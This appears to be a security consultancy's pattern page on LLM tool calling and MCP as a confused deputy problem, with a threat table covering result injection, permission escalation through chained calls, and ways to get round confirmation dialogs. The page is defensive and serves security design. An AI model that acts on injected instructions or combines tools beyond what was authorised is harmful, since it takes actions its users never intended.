Tool Calling Is Ambient Authority by Default
Why MCP and function calling implementations ship with confused deputy vulnerabilities
The Conventional Framing
Tool calling extends LLM capabilities. MCP (Model Context Protocol) standardizes how models interact with external tools and resources. Security means validating inputs, requiring user confirmation for sensitive actions, and maybe some rate limiting.
The mental model is: tools are functions, the model calls them with parameters, we validate those parameters. Add a confirmation dialog for dangerous operations and you're covered.
Why This Is Dangerously Naive
Every tool calling implementation we've reviewed ships with ambient authority. The model can invoke tools simply because they're registered. Permission is implicit in presence.
This is the confused deputy problem with a new coat of paint. The model isn't malicious—it's confused. It can't distinguish between instructions from the user, instructions injected via prior context, and instructions smuggled in through tool results. It has authority but no authentic intent.
And the industry's answer is "add a confirmation dialog."
What confirmation dialogs actually protect against:
- Accidental tool calls
- Users who read dialogs carefully
- Your legal exposure
What they don't protect against:
- Users habituated to clicking approve
- Attacks that stage innocuous calls before dangerous ones
- Multi-step exploits where no single call looks harmful
- Timing—approve now, execute later when context has shifted
The compounding problem with MCP:
MCP is a good protocol. That's what makes it dangerous. It lowers the friction to connect models to everything—filesystems, databases, APIs, SaaS platforms. Each server grants capabilities. Capabilities compose.
The permission surface isn't additive, it's combinatorial.
You install five MCP servers with reasonable individual permissions. The model now has the combined authority of all five, and no one has reasoned about the interactions.
Architecture
Components:
- Orchestrating model— planning, tool selection, parameter construction
- Tool registry— available capabilities with schemas
- Executor— invocation layer between model and tools
- Tool servers— external systems (MCP servers, APIs, etc.)
- Result handler— parses responses, manages errors
Trust Boundaries
- User → Model — user input may contain injections
- Model → Executor — model decisions may not reflect user intent
- Executor → Tools — network boundary, external systems
- Tools → Model — results are untrusted input
Threat Surface
| Threat | Vector | Impact |
|---|---|---|
| Tool abuse | Model manipulated into calling tools with malicious parameters | Unauthorized actions, data exfiltration |
| Confused deputy | Model acts on injected instructions, not user intent | Actions attributed to user they didn't authorize |
| Permission escalation | Chained tool calls exceed intended authorization | Privilege amplification through composition |
| Result injection | Malicious content in tool responses influences next actions | Persistent compromise of reasoning loop |
| Schema exploitation | Malformed tool definitions enable unintended behaviors | Capability expansion beyond design |
| Resource exhaustion | Unbounded tool invocation loops | Denial of service, cost explosion |
| Capability composition | Multiple tools combine to enable unauthorized actions | Emergent permissions no one designed |
The ZIVIS Position
- •Capability-based, not identity-based.Don't ask "is this user allowed to delete files." Ask "was this specific invocation chain granted delete authority for this specific resource." Capabilities should be scoped, attenuated, and non-transferable.
- •Intent verification is the hard problem.The model deciding to call a tool is not the same as the user intending that call. Build systems that establish authentic intent—whether that's cryptographic approval chains, out-of-band confirmation, or constrained action spaces.
- •Treat tool results as adversarial.The API you called might be compromised. The file you read might contain injection payloads. Tool results go into a quarantine context, not straight back into the reasoning loop.
- •Permission boundaries must be explicit and auditable.If you can't draw the trust boundary diagram for your tool configuration, you don't have a security model. You have a hope.
- •Fail closed, not open.Model uncertainty about whether to call a tool should resolve to not calling it. The default is no authority, not ambient authority.
What We Tell Clients
Your tool calling implementation is a capability system whether you designed it as one or not. The question is whether it's a coherent capability system with explicit trust boundaries, or an ad-hoc accumulation of permissions that an attacker will understand better than you do.
If you've connected your LLM to production systems via MCP or function calling without a formal capability model, you've built a confused deputy with write access.
Related Patterns
- Multi-Agent Orchestration— multiplies the confused deputy problem
- A2A Protocol— same trust issues for inter-agent communication
- Privilege Separation— the pattern you should be using
- Tool Allowlisting— necessary but not sufficient
- Confirmation Loops— why they don't solve the problem